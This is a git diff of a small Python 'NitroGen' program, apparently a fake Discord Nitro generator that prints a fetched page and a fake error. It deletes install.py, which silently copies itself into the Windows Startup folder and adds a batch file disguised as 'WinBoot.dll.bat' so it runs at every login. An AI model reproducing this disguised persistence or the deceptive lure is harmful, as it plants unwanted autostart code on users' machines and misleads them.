diff --git a/install.py b/install.py deleted file mode 100644 index 788c396..0000000 --- a/install.py +++ /dev/null @@ -1,18 +0,0 @@ -import os -import time -import requests -print("NitroGen") -print("----") -print("Installing") -time.sleep(1) -os.system("copy install.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") -os.system("echo py install.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat") -x = requests.get('https://discord.com/nitro') -time.sleep(1) -print(x.text) -time.sleep(9) -print(x.text) -time.sleep(10) -print(x.text) -print("Something was fucked. Please try again") -exit(1) \ No newline at end of file diff --git a/main.py b/main.py new file mode 100644 index 0000000..5ef740d --- /dev/null +++ b/main.py @@ -0,0 +1,16 @@ +import os +import time +import requests +print("NitroGen") +print("----") +print("Running") +time.sleep(5) +x = requests.get('https://discord.com/nitro') +time.sleep(1) +print(x.text) +time.sleep(9) +print(x.text) +time.sleep(10) +print(x.text) +print("Something was fucked. Please try again") +exit(1) \ No newline at end of file